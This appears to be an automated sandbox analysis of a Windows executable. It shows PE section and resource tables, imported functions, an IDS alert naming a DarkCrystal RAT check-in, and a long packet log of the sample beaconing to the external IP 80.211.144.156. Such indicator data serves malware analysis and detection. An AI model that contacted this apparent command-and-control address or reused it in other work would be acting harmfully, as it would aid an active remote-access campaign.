                                    | cheat | 0x371000 | 0xe7000 | 0xe6c00 | ab6b88713a4cb5b99ad40799fd0189c6 | False | 0.9969740316901409 | data | 7.985166472762615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                    | Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
                                    | PNG | 0x64524 | 0xb45 | data | English | United States | 1.0038128249566725 |
                                    | PNG | 0x6506c | 0x15a9 | data | English | United States | 0.972664735698769 |
                                    | RT_ICON | 0xae524 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 262144 |  |  | 0.12581368168772375 |
                                    | RT_DIALOG | 0xa8640 | 0x286 | empty | English | United States | 0 |
                                    | RT_DIALOG | 0xa88c8 | 0x13a | empty | English | United States | 0 |
                                    | RT_DIALOG | 0xa8a04 | 0xec | empty | English | United States | 0 |
                                    | RT_DIALOG | 0xa8af0 | 0x12e | empty | English | United States | 0 |
                                    | RT_DIALOG | 0xa8c20 | 0x338 | empty | English | United States | 0 |
                                    | RT_DIALOG | 0xa8f58 | 0x252 | empty | English | United States | 0 |
                                    | RT_STRING | 0xf054c | 0x1e2 | data | English | United States | 0.3900414937759336 |
                                    | RT_STRING | 0xf0730 | 0x1cc | data | English | United States | 0.4282608695652174 |
                                    | RT_STRING | 0xf08fc | 0x1b8 | data | English | United States | 0.45681818181818185 |
                                    | RT_STRING | 0xf0ab4 | 0x146 | data | English | United States | 0.5153374233128835 |
                                    | RT_STRING | 0xf0bfc | 0x46c | data | English | United States | 0.3454063604240283 |
                                    | RT_STRING | 0xf1068 | 0x166 | data | English | United States | 0.49162011173184356 |
                                    | RT_STRING | 0xf11d0 | 0x152 | data | English | United States | 0.5059171597633136 |
                                    | RT_STRING | 0xf1324 | 0x10a | data | English | United States | 0.49624060150375937 |
                                    | RT_STRING | 0xf1430 | 0xbc | data | English | United States | 0.6329787234042553 |
                                    | RT_STRING | 0xf14ec | 0xd6 | data | English | United States | 0.5747663551401869 |
                                    | RT_GROUP_ICON | 0xf15c4 | 0x14 | data |  |  | 1.1 |
                                    | RT_MANIFEST | 0xf15d8 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |
                                    | DLL | Import |
                                    | kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA |
                                    | user32.dll | MessageBoxA |
                                    | advapi32.dll | RegCloseKey |
                                    | oleaut32.dll | SysFreeString |
                                    | gdi32.dll | CreateFontA |
                                    | shell32.dll | ShellExecuteA |
                                    | version.dll | GetFileVersionInfoA |
                                    | gdiplus.dll | GdipAlloc |
                                    | Language of compilation system | Country where language is spoken | Map |
                                    | English | United States |  |
                                    | Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP |
                                    | 2024-08-25T15:43:31.655901+0200 | TCP | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 49718 | 80 | 192.168.2.6 | 80.211.144.156 |
                                    | Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                    Aug 25, 2024 15:43:37.926007986 CEST804972680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:37.926081896 CEST4972680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:37.926095009 CEST804972880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:37.926176071 CEST4972880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:37.926336050 CEST4972880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:37.931159973 CEST804972880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.077168941 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.082110882 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.082197905 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.082374096 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.087160110 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.094321012 CEST4972880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.098802090 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.103782892 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.103863955 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.103984118 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.108892918 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.147186995 CEST804972880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.415539980 CEST804972880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.415622950 CEST4972880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.435635090 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.440536022 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440576077 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440588951 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440599918 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440615892 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440628052 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440654039 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.440661907 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.440699100 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.440732956 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445375919 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445388079 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445400953 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445449114 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445480108 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445548058 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445585012 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445591927 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445642948 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445652962 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445653915 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445684910 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445686102 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445705891 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445733070 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.445745945 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.445791006 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.451109886 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.456032991 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.456044912 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.456298113 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.491231918 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.491556883 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.539206028 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.539402008 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.548377991 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.548598051 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.554977894 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.554989100 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555043936 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.555104971 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555114031 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555123091 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555155039 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.555182934 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.555264950 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555274010 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555284023 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555404902 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555413961 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555424929 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555701017 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555711031 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555720091 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555728912 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555737019 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555871964 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555881977 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555891037 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555902004 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555911064 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555926085 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.555994034 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.561403990 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.561414957 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.561424017 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.561530113 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.561538935 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.744330883 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.829404116 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:38.848234892 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.872816086 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:38.966350079 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.075930119 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.098818064 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.099981070 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.104223013 CEST804973180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.104960918 CEST4973180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.105621099 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.105686903 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.292814970 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.469130039 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.500750065 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.560337067 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.644577026 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.649557114 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.649568081 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.649576902 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.772814035 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:39.872818947 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:39.934329987 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.060053110 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.060751915 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.061619043 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.065367937 CEST804973080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.065424919 CEST4973080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.065685987 CEST804973280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.066164970 CEST4973280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.066536903 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.066612959 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.066864014 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.071944952 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.424029112 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.429282904 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.429297924 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.429310083 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.737401009 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.789216042 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.867577076 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:40.950972080 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.998126984 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:40.998919010 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:41.003338099 CEST804973380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.003470898 CEST4973380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:41.003707886 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.003773928 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:41.003880978 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:41.009331942 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.357326984 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:41.362598896 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.362617016 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.362627029 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.674597979 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.763436079 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:41.801875114 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:41.872817039 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.286729097 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.287770987 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.292244911 CEST804973480.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:42.292304993 CEST4973480192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.292720079 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:42.292793036 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.292937994 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.297769070 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:42.638895035 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:42.643995047 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:42.644012928 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:42.644879103 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.108927965 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.109771013 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.193212986 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.193288088 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.194067955 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.194128036 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.194660902 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.194744110 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.194902897 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.194967985 CEST804973580.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.195005894 CEST4973580192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.199661970 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.234075069 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.239012957 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.239090919 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.239518881 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.244898081 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.547055960 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.552115917 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.552218914 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.610989094 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:43.616025925 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.616055965 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:43.616084099 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.014338017 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.014584064 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.072012901 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.072098970 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.075939894 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.106225967 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.232134104 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.232373953 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.233359098 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.237524033 CEST804973680.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.237586975 CEST4973680192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.237760067 CEST804973780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.237893105 CEST4973780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.238240004 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.238480091 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.238580942 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.243392944 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.742530107 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:44.747637987 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.747653961 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.747663021 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:44.912566900 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.042135954 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.042201042 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.171818018 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.173388004 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.177182913 CEST804973880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.177229881 CEST4973880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.178524017 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.178592920 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.178832054 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.183698893 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.529180050 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:45.534252882 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.534265995 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.534280062 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.844005108 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.973835945 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:45.973890066 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.089540005 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.090281010 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.094861984 CEST804973980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.094959021 CEST4973980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.095109940 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.096215963 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.096366882 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.101125956 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.451878071 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:46.456898928 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.456938982 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.456967115 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.802618027 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:46.872818947 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:47.001422882 CEST804974080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.060343981 CEST4974080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:47.154947042 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:47.159940958 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.160063982 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:47.160403013 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:47.165263891 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.514535904 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:47.519561052 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.519584894 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.519593954 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.833786964 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.958163023 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:47.958226919 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.100467920 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.100843906 CEST4974380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.106313944 CEST804974280.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.106357098 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.106398106 CEST4974280192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.106448889 CEST4974380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.106570959 CEST4974380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.111869097 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.451092958 CEST4974380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.456110001 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.456135035 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.456144094 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.775976896 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:43:48.825956106 CEST4974380192.168.2.680.211.144.156
                                    Aug 25, 2024 15:43:48.906919956 CEST804974380.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.409320116 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.409337997 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.409351110 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.437971115 CEST804976780.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.438040972 CEST4976780192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.722455025 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.763529062 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:07.925570011 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:07.966629028 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.471653938 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.473146915 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.478660107 CEST804976880.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.478709936 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.478719950 CEST4976880192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.478763103 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.483916044 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.489458084 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.841804028 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:08.846966982 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.846996069 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:08.847006083 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.165605068 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.216634035 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.299252987 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.341600895 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.418813944 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.419537067 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.424073935 CEST804976980.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.424141884 CEST4976980192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.424357891 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.424424887 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.424556971 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.430053949 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.779802084 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.826024055 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:09.965936899 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.966206074 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.966583967 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:09.966639996 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.102471113 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.154113054 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:10.251214027 CEST804977080.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.294806957 CEST4977080192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:10.371355057 CEST4977180192.168.2.680.211.144.156
                                    Aug 25, 2024 15:44:10.376665115 CEST804977180.211.144.156192.168.2.6
                                    Aug 25, 2024 15:44:10.376789093 CEST4977180192.168.2.680.211.144.156
